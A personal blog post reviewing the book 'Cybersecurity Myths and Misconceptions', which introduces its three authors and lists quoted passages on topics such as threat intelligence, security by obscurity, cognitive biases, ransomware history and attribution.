Sercan Azizoğlu's Personal Website
February 4, 2025

Cybersecurity Myths and Misconceptions by Eugene H. Spafford, at all - A Book Review

Posted on February 4, 2025  •  17 minutes  • 3616 words
Table of contents

The Book and the Authors

The book is written by three authors.

Eugene Howard Spafford is a professor at the University of Purdue. He is a well-known figure and researcher in computer science, especially for his contributions to information security, cybercrime investigation and information ethics.

Leigh Metcalf is a senior network security research analyst at Carnegie Mellon Univerity’s Software Engineering Institute’s Computer Emergency Response Team. She holds a PhD in mathematics. She has worked as a systems engineer, architect, and security specialist.

Josiah Dykstra is an active figure who participates in professional service working groups, organizations, and committees. He also wrote “Essential Cybersecurity Science” in 2016, available on Amazon.

In their book, they list dozens of myths and misconceptions in cybersecurity. Some are quite common but rare and require attention, such as the attribution of attacks. Do you need to know the attacker’s identity as a defender rather than take the necessary mitigation activities? Of course, mitigation is the priority rather than attribution. That is an excellent and up-to-date reference for cybersecurity professionals. If you’re new in the field or have years of experience, requesting our assumptions with the support of the dear authors is still applicable.

I want to thank three distinguishable authors for their helpful work. That would support the goal of creating a safer cyberspace.

Here are some points to cite that caught my attention from the book available on Amazon.

Citations from the book

Among the most powerful of defensive tools is critical thinking. (p.20)

Science can update, validate, and dispel cybersecurity myths by using standardized methods and producing valid evidence. (p.26)

One reason is that technology and threats change, but education is slow to catch up. Unless people take continuing education seriously, it’s easy to fall behind when old truths become modern myths. (p.27)

Some employees believed that links were more dangerous than attachments as clicking them automatically compromised the computer, while others argued that attachments were harmless if you did not allow them to install. (p.27)

Many kids in the 1980s believed that blowing on game cartridges would fix technical problems because dust might be causing issues. (p.28)

First, cybersecurity is not merely about protecting computers and networks. (p.29)

Second, cybersecurity involves computers; however, cybersecurity is primarily about humans. (p.29)

Computers are tools used by people, intended for people, and built by people. (p.30)

Third, sometimes computers malfunction. (p.30)

We see cybersecurity as human-centric. (p.30)

Cybersecurity experts should be viewed as enablers of good practice, as allies and educators—not as authoritarian arbiters of arcane rules who mete out punishment for transgressions. (p.30)

A ship in harbor is safe, but that is not what ships are built for. John A. Shedd (p.39)

As Lord Kelvin wrote, “I often say that when you can measure what you are speaking about, and express it in numbers, you know something about it; but when you cannot measure it, when you cannot express it in numbers, your knowledge is of a meagre and unsatisfactory kind.” (p.43)

Bruce Schneier summarized this difference in one of his Crypto-Grams: “Avoiding threats is black and white: either we avoid the threat, or we don’t. Avoiding risk is continuous: there is some amount of risk we can accept, and some we cannot.” (p.47)

If a workforce lives in constant fear of cyber threats or punishment for the wrong action, they will be unhappy, unproductive, and potentially paralyzed by fear. (p.54)

Cyber Threat Intelligence (CTI) is “evidence-based knowledge, including context, mechanisms, indicators, implications, and action-oriented advice about an existing or emerging menace or hazard to assets.” (p.55)

Threat intelligence takes many forms. On one end is a list of IP addresses, domains, or email addresses that one entity believes are malicious. (p.55)

Comes from using only high-quality CTI that is timely, accurate, and actionable. (p.56)

A company might be worse off with more CTI if the costs outweigh the benefits. As a result, better security. (p.56)

Blocklists are an example of CTI. People either sell them or provide them for free, and it’s an easy way to block known-bad IP addresses, domains, or malware hashes. There are dozens of such lists. The problem is that research has shown that these lists are mostly distinct. To use blocklists effectively, we need to collect all the lists. Yes, like Pokémon, gotta catch ’em all. That requires time, space, and processing. (p.56)

For example, in the Financial Services ISAC, more than 7,000 members in 70-plus countries collaborate and share confidential threat intelligence. (p.56)

Attackers, similar to other humans, are lazy. (p.60)

Some estimates that OSS makes up 70% of current software applications. (p.63)

Most code producers are interested in fast and cheap, and the processes shown to reduce defects are not known for those qualities. (p.65)

Attackers target domain controllers because that’s a server that member computers trust. (p.67)

We cannot change our fingerprints if they are our authenticators and are compromised. (p.69)

Hackers also demand proof-of-concept examples to be taken seriously. One publication puts a fine point on this: International Journal of Proof-of-Concept or Get the Fuck Out. (p.71)

There is an endless amount of cybersecurity-related activity and behavior that is legal and technically achievable, yet inadvisable. (p.76)

Yes, Virginia, there was an IPv5, but it was never standardized. There also were protocols IPv7—IPv9. (p.82)

One expert on domain name use, Paul Vixie, has suggested that if we block all new domains for 24 hours after they are created, the amount of spam we see will drop significantly. (p.87)

The defense that works today might not work tomorrow. That is why security is not a set of things you do and then forget about them; instead, cybersecurity is a continuing activity that needs to adapt and change with time and circumstances. (p.88)

They also lead to nonsense such as Non-fungible Tokens (NFTs) (and no, we are not going to go into depth on why those are beyond silly and into the realm of Ponzi schemes). (p.95)

The TOR Project, a nonprofit that works on software used on the dark web, is partly funded by the U.S. State Department to promote democracy and human rights in oppressive regimes. (p.96)

The TOR Project website has a notice that “Generally it is impossible to have perfect anonymity, even with TOR.” (p.96)

Humans evolved to avoid physical world danger, but identifying danger online is more complicated and difficult. (p.103)

Some organizations have a “three strikes” rule for some behaviors: warning on the first occasion, retraining on the second violation, and job termination on the third violation. (p.107)

In 2004, James Surowiecki wrote a well-known book titled The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations. He described how large groups show more intelligence in some situations than individuals or smaller groups. This idea dates back thousands of years to Aristotle. It is also related to the concept of democracy. (p.107)

The wisdom of crowds should guide fact-based decisions but should never replace deliberate, informed thinking. (p.108)

To quote the great Arthur C. Clarke: “Two possibilities exist: either we are alone in the Universe, or we are not. Both are equally terrifying.” (p.108)

To channel Donald Rumsfeld, there are known unknowns and unknown unknowns in cybersecurity. (p.109)

Absence of evidence is not evidence of absence. (p.116)

Many years ago, the City of Atlanta had an emergency announcement line. In a time of grave public danger, one of the city leaders could call an unpublished phone number and speak an announcement, which would be broadcast on all the local radio and television stations. Note: No passcode was required—security by obscurity at its finest. If nobody knows the number, nobody will call it. (p.121)

If someone launches a secret web server and tells nobody about it, Shodan will still find it in under a week. (p.121)

To be fair, adding obscurity might add to security. An unpublished bit of information might be found through effort or luck, but it requires something extra on the attacker’s part. Sometimes, imposing that additional cost is enough to make a system less attractive than another or to keep an automated attack from working. So long as it is not the only or primary defense, it might have some value. (p.123)

Is High-Tech Better than Low-Tech? It feels like a trick question, doesn’t it? See the Arthur C. Clarke short story “Superiority” for a fictional version of this. (p.127)

Opportunity cost should be an integral aspect of cybersecurity in every decision. (p.134)

Can opportunity cost ever be positive? It can, according to U.S. Cyber Command, which routinely discusses the goal of “imposing cost” on adversaries. Honeypots are one example of this because they consume an attacker’s time and effort without causing real damage. (p.134)

Opportunity cost is the loss of potential gain from other alternatives when one alternative is chosen. (p.133)

Correlation does not mean causation, but it can give a nudge that the items should be examined more closely to see if there is a functional relationship. (p.142)

Anomalous is not a synonym for malicious, the same as correlation does not mean causation. (p.154)

A Black Swan event occurs outside the realm of imagined possibility. (p.154)

Carrington Event and the possibility of a Cumbre Vieja tsunami. (p.155)

It’s a common characteristic to assume that good things will happen and that bad things will not. In probabilistic terms, we think that good things are more likely to happen, and bad things are less likely to happen. The Valence Effect is this tendency to overestimate the likelihood of good things happening rather than bad things. (p.158)

The action bias is where we prefer action to inaction, even when it is counterproductive. (p.167)

The omission bias: the tendency to favor inaction (omission) over action. (p.168)

You did keep a copy of the card in your safe deposit box, right? This is a form of key escrow. We should be sure we have some protected, alternate copy of critical information in case we lose our current list. (p.169)

The ones that are caught are not a threat; the ones that are not caught are the threat. (p.171)

For important questions, consider starting to keep track of information you might need to make a future decision. (p.176)

Thus, an estimate of two hours would be quoted to management as five days; our experience has shown this is often a reasonable estimate. (p.179)

Cobra effect. It is named for something that happened when the British ruled India. The officials of the Raj wanted to decrease the number of cobras. So, leadership offered a bounty for every dead cobra. At first, it worked, and the population of cobras decreased. But, unsurprisingly, in retrospect, people began to breed cobras, knowing they could get rewards. Once the British found out this was happening, they canceled the bounty. The people breeding the cobras no longer had any incentive to keep breeding them, so many of them simply released all their cobras into the wild. The result was an increase in the number of cobras from before the bounty program existed. (p.186)

Some Internet service providers quarantine infected machines, an approach known as a walled garden. (p.189)

Rome was not built in a day, and when it was constructed, some buildings were fine and some were torn down (or collapsed). It was not a case where a magic wand was waved, and an entire city showed up perfectly constructed from the start; instead, it was a case where the Romans learned as they went along. (p.200)

In science, negative results are findings that do not support the hypothesis. (p.200)

Cybersecurity generally does a poor job of documenting and sharing negative results. We almost always see presentations and papers talking about positive results. We should also be sharing things we tried that did not work so that others can learn from our attempts. (p.200)

Cybersecurity studies how this data is misused and altered, by malware, vulnerabilities, malicious websites, or any other badness. (p.204)

Spending valuable time and effort to optimize a solution used only a few times while other important tasks are pending should be avoided. (p.206)

The right-hand rule says that when you enter a maze, put your right hand on the wall and then continue to follow the right wall, which will eventually lead you to the exit. (p.206)

Tischer, Matthew, et al., “Users Really Do Plug in USB Drives They Find,” IEEE Symposium on Security and Privacy, IEEE, 2016. (p.208)

Ransomware first appeared in 1989, but it was not until Bitcoin was invented in 2008 that it became a thing. (p.211)

The first formal degree-granting program in computer science was started in October 1962 at (surprise) Purdue, and the first cybersecurity degree was initiated in 2000 at… wait for it… Purdue University. Compared to chemistry, psychology, and mathematics, these are new fields. (p.212)

Someone immersed in self-study, perhaps including military training or industry internships, with significant motivation and talent, might also have a deep skillset. (p.215)

Instead of worrying about how to produce more firefighters, perhaps we should put some effort into reducing the construction of buildings from gasoline-soaked balsa wood. (p.220)

The Clarifying Lawful Overseas Use of Data Act (CLOUD Act) is a U.S. federal law that allows federal law enforcement to compel U.S.-based tech companies to hand over data stored on servers without regard to where it is physically stored. (p.246)

Once we have cloud data centers in orbit or on the Moon, we will have some interesting litigation issues. (p.247)

This phrase originated when Slashdot, a popular tech news site, would link to websites in its posts and sometimes overloaded the site with a sudden surge of visitors. See Slashdot Effect . (p.273)

To avoid the pitfall of believing that security tools are inherently secure and trustworthy, treat them with at least some caution and due diligence. Vulnerabilities can be anywhere. (p.276)

The vulnerability scanner looks for something that could happen, and the malware (or IDS scanner) looks for something that did happen. (p.277)

If there are too many false alarms, it can lead to the assumption that every alarm is a false positive—the “cry wolf” effect. (p.277)

Finding nothing does not mean there is nothing to find. (p.277)

Humans have, so far, mapped only about 20% of the oceans. That means that 80% of the seafloor under the earth’s water has never been examined. There are things in the sea we do not know about. Luckily, for oceans, we can say, “We have mapped this much, and we do not know about the rest.” Cybersecurity is not that precise. We can say we know things, but we cannot express how much we do not know. (p.278)

Threat hunting. They are hunting for a new attack that bypassed the current alarms. (p.279)

The catalog for CWEs runs the gamut, from CWE-121, stack-based overflow, to CWE-546, suspicious comment. As of this writing, no CVE has been tagged with a suspicious comment CWE—though one could take this comment about a suspicious comment CWE as being suspicious and assign that CWE to it. (p.284)

Security vendor Mandiant, for instance, considers a zero-day to be anything without a patch available, even if it is known to the public. (p.288)

A simple phishing email or phone call asking for information is more successful than most people think. (p.292)

CVE-2018-10993 disproves that. A remote user would connect, and before giving their password, they could send the string MSG_USERAUTH_SUCCESS and then, surprise, the connection was allowed. (p.295)

Only 5% of vulnerabilities published in the CVE database had published exploits. (p.295)

It is not the users’ fault that they are using the default configuration. It is wrong to assume that everyone buying an appliance will be an expert and be able to tweak it perfectly. (p.296)

The surest way to get some programmers to write a program is to tell them it cannot be done. (p.306)

Sometimes there is no way to repair the software, and we must build our defenses around it. (p.308)

The Hippocratic Oath starts with “Primum non nocere,” meaning “First, do no harm.” Security practitioners should follow that rule as well. (p.311)

Focus on risk and mitigation, not on names. (p.312)

Even legitimate capabilities can be used to achieve mischief; using built-in programs and features to avoid the detection of custom malware even has a name: living off the land. (p.314)

Algorithms and data references can be incredibly complex. For a historical analogy, consider the Antikythera mechanism, discovered in 1901. It was not until 2021 that scientists figured out how it probably worked. (p.321)

Many criminal organizations in Russia write ransomware that is not intended to run inside Russia. The Russian government tolerates the criminals (and might even sometimes employ them) so long as they do not target Russians. (p.322)

One study found that a small set of countries hosted 85% of the distribution sites for malware. (p.323)

There are undoubtedly even larger pieces of malware. Some items now contain virtual machine emulators and their own in-memory file systems. (p.327)

The first ransomware goes back at least to 1989 and was spread by floppy disk. A researcher spread it by handing out 20,000 floppy disks at a conference. (p.332)

A group project named No More Ransom collects keys and tools to help you retrieve your data. (p.333)

Suppose a bank president assumes that a small team of junior staff who primarily reset account passwords can also respond to ransomware. (p.339)

One instance of an APT installation might be found, but three others by different groups might also be present. (p.343)

Attribution does not defend networks. Instead, when investigating incidents, consider this mantra: “It is not ‘Who did this?’ but ‘Why me, and how?’ ” This statement acknowledges that the most important consideration for companies and citizens is not necessarily identifying, prosecuting, or eliminating a specific threat actor. (p.354)

To many individuals and businesses, attribution is at most a minor concern compared to protecting assets. (p.355)

In 2013, Anton Chuvakin at Gartner first introduced the phrase endpoint detection and response (EDR). (p.358)

Fun fact: Hovering around your security team is likely to slow them down if you are the CEO in this situation. Give them space, time, and resources rather than your expert attention. (p.360)

If you torture the data long enough, it will confess. — Ronald Coase, as quoted by Irving John Good (p.363)

There is the old story that there is no Nobel Prize in Mathematics because Alfred Nobel’s wife slept with a mathematician. Although we doubt a quick nap would lead to enmity, the implication is that she was awake—enthusiastically. That story, however, is another myth; Alfred Nobel was never married. (p.363)

If that program labels an IP address as malicious when it is not, it has given us a false positive. If it does not tell us that an IP address is malicious when it is, it is a false negative. (p.376)

Data bias is also a feature of cybersecurity in general. We generally can collect only data we happen to find. That can lead to biases in the data, so we must acknowledge that possibility and be careful. (p.379)

Artificial intelligence is not intelligent. (p.382)

The unfortunate thing is, people often do not report false negatives and false positives. An ML box that does not tell you these two values is not useful and can be misleading. (p.385)

The goal of a visualization is to communicate and help a viewer understand the information or answer a specific question. (p.387)

Research has shown that the use of carefully designed checklists evolved based on experience is incredibly helpful in avoiding some mistakes. (p.396)

Preparation is usually more straightforward and less costly than remediation. (p.396)

You might have heard that “Forgiveness is simpler to obtain than permission.” Avoid situations where that is the modus operandi because it is not always true. If you are a manager or supervisor, do not build or encourage that environment. Similarly, “Move fast and break things” might seem like a formula for success with start-ups, but it is a lousy and unsuitable way to pursue quality, safety, privacy, and security. If you work in any of those -y areas, you want your colleagues to naturally envision you as saying, “Let me show you how to do that better” rather than, “No, you cannot do that!” or “We will worry about that in the next release.” That is, become a welcoming guru rather than a stern gatekeeper. (p.397)

If you welcome discussion and questions, you might be less likely to fall victim to your own misconceptions. (p.397)

In a less technological sense, we can be better myth busters if we are humble and acknowledge that myths and misconceptions are a part of life. (p.399)

Professional associations and meetings are one way to exchange ideas and quell myths. (p.400)

no documented threat model captures the circumstances in which that valuable intellectual property is at risk. (p.401)

Companies grow and change. Assuming decisions made in the beginning are always correct is a bad idea. (p.402)

All decisions should be written down along with the important “why.” If you do not write it down, you might find yourself subject to the 2 a.m. phone call demanding an explanation. (p.402)

As Robert H. Courtney, Jr., expressed in his Third Law: “There are no technical solutions to management problems, but there are management solutions to technical problems.” (p.404)

Focus on respected publications, seminars, and classes held by professional nonprofit associations such as ACM, USENIX, and ISSA. Note that the mark of good science and engineering is the willingness to change approaches based on new evidence; politics and religion are where people claim to have the absolute, immutable facts, not cybersecurity. (p.405)

Social Media

LinkedIn